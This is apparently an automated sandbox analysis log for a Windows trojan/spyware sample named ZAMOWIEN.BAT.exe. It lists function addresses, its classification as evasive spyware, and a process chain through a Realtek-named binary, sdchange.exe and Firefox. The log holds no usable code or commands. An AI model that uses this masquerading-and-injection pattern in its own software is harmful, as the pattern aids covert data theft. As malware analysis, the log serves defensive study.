          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Windows\resources\0409\mysterist.iniJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00404C680_2_00404C68
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_0040698E0_2_0040698E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_70501B630_2_70501B63
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778D6462_2_3778D646
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779F6F62_2_3779F6F6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377536EC2_2_377536EC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779F5C92_2_3779F5C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377975C62_2_377975C6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377754902_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774D4802_2_3774D480
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779F3302_2_3779F330
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D13802_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779124C2_2_3779124C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD2EC2_2_376CD2EC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3772717A2_2_3772717A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D1302_2_3777D130
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF1132_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E02_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E51C02_2_376E51C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377970F12_2_377970F1
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EB0D02_2_376EB0D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3771508C2_2_3771508C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779FF632_2_3779FF63
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775FF402_2_3775FF40
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37791FC62_2_37791FC6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37799ED22_2_37799ED2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB22_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37797D4C2_2_37797D4C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779FD272_2_3779FD27
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777FDF42_2_3777FDF4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E9DD02_2_376E9DD0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3C602_2_376E3C60
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FFCE02_2_376FFCE0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37767CE82_2_37767CE8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37779C982_2_37779C98
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779FB2E2_2_3779FB2E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3771DB192_2_3771DB19
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37771B802_2_37771B80
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FFAA02_2_376FFAA0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779FA892_2_3779FA89
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377259C02_2_377259C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377558702_2_37755870
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779F8722_2_3779F872
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E98702_2_376E9870
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB8702_2_376FB870
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E38002_2_376E3800
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377978F32_2_377978F3
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377918DA2_2_377918DA
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377598B22_2_377598B2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E27602_2_376E2760
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EA7602_2_376EA760
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377967572_2_37796757
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377046702_2_37704670
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FC6002_2_376FC600
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DC6E02_2_376DC6E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779A6C02_2_3779A6C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E06802_2_376E0680
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AA5262_2_377AA526
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E04452_2_376E0445
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EE3102_2_376EE310
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A010E2_2_377A010E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778E0762_2_3778E076
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D00A02_2_376D00A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376ECF002_2_376ECF00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E6FE02_2_376E6FE0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779EFBF2_2_3779EFBF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37780E6D2_2_37780E6D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37700E502_2_37700E50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37722E482_2_37722E48
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D2EE82_2_376D2EE8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37790EAD2_2_37790EAD
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E0D692_2_376E0D69
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DAD002_2_376DAD00
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F2DB02_2_376F2DB0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37796C692_2_37796C69
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779EC602_2_3779EC60
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778EC4C2_2_3778EC4C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EAC202_2_376EAC20
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775EC202_2_3775EC20
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D0C122_2_376D0C12
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AACEB2_2_377AACEB
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F8CDF2_2_376F8CDF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E0B102_2_376E0B10
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37754BC02_2_37754BC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779EA5B2_2_3779EA5B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779CA132_2_3779CA13
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DE9A02_2_376DE9A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779E9A62_2_3779E9A6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C68682_2_376C6868
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377808352_2_37780835
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770E8102_2_3770E810
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E28C02_2_376E28C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777C89F2_2_3777C89F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F68822_2_376F6882
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373DE7E02_2_373DE7E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373E55712_2_373E5571
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373DE4442_2_373DE444
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373DE3252_2_373DE325
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373DCB332_2_373DCB33
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373DD8A82_2_373DD8A8
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0069D4443_2_0069D444
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0069C8A83_2_0069C8A8
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0069D3253_2_0069D325
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0069BB333_2_0069BB33
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0069D7E03_2_0069D7E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043904454_2_04390445
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0445A5264_2_0445A526
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AC6004_2_043AC600
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043B46704_2_043B4670
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444A6C04_2_0444A6C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043906804_2_04390680
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0438C6E04_2_0438C6E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044467574_2_04446757
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0439A7604_2_0439A760
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043927604_2_04392760
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0443E0764_2_0443E076
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043800A04_2_043800A0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0445010E4_2_0445010E
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0439E3104_2_0439E310
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0443EC4C4_2_0443EC4C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0439AC204_2_0439AC20
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444EC604_2_0444EC60
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04380C124_2_04380C12
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04446C694_2_04446C69
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0440EC204_2_0440EC20
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0445ACEB4_2_0445ACEB
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043A8CDF4_2_043A8CDF
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0438AD004_2_0438AD00
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04390D694_2_04390D69
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043A2DB04_2_043A2DB0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04430E6D4_2_04430E6D
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043B0E504_2_043B0E50
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043D2E484_2_043D2E48
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04382EE84_2_04382EE8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04440EAD4_2_04440EAD
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0439CF004_2_0439CF00
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04396FE04_2_04396FE0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444EFBF4_2_0444EFBF
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043BE8104_2_043BE810
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043768684_2_04376868
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044308354_2_04430835
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043A68824_2_043A6882
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442C89F4_2_0442C89F
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043928C04_2_043928C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0438E9A04_2_0438E9A0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444E9A64_2_0444E9A6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444EA5B4_2_0444EA5B
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444CA134_2_0444CA13
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04432AC04_2_04432AC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04390B104_2_04390B10
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04404BC04_2_04404BC0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043FD4804_2_043FD480
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044254904_2_04425490
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044475C64_2_044475C6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F5C94_2_0444F5C9
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0443D6464_2_0443D646
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044316234_2_04431623
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442D62C4_2_0442D62C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044036EC4_2_044036EC
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F6F64_2_0444F6F6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043C508C4_2_043C508C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044470F14_2_044470F1
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0439B0D04_2_0439B0D0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0437F1134_2_0437F113
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043D717A4_2_043D717A
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442D1304_2_0442D130
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AB1E04_2_043AB1E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043951C04_2_043951C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444124C4_2_0444124C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0437D2EC4_2_0437D2EC
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F3304_2_0444F330
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043813804_2_04381380
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04393C604_2_04393C60
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04417CE84_2_04417CE8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AFCE04_2_043AFCE0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04429C984_2_04429C98
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04447D4C4_2_04447D4C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FD274_2_0444FD27
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0442FDF44_2_0442FDF4
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04399DD04_2_04399DD0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04391EB24_2_04391EB2
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04449ED24_2_04449ED2
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0440FF404_2_0440FF40
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FF634_2_0444FF63
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04441FC64_2_04441FC6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04433FA04_2_04433FA0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044058704_2_04405870
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444F8724_2_0444F872
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043938004_2_04393800
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043998704_2_04399870
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AB8704_2_043AB870
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044418DA4_2_044418DA
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044478F34_2_044478F3
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_044098B24_2_044098B2
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043D59C04_2_043D59C0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043AFAA04_2_043AFAA0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FA894_2_0444FA89
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043CDB194_2_043CDB19
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0444FB2E4_2_0444FB2E
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04421B804_2_04421B80
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474EFFA4_2_0474EFFA
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474E4444_2_0474E444
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474E7E04_2_0474E7E0
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474E3254_2_0474E325
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474D8A84_2_0474D8A8
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474CB334_2_0474CB33
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 376CB910 appears 275 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 3774E692 appears 86 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 37715050 appears 58 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 37727BE4 appears 101 times
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: String function: 3775EF10 appears 104 times
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 043FE692 appears 86 times
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 043C5050 appears 58 times
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0437B910 appears 278 times
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 043D7BE4 appears 102 times
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0440EF10 appears 105 times
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs ZAMOWIEN.BAT.exe
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.000000003761D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
          Source: ZAMOWIEN.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@7/10@19/13
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nsw67B4.tmpJump to behavior
          Source: ZAMOWIEN.BAT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile read: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
          Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: edgegdi.dllJump to behavior
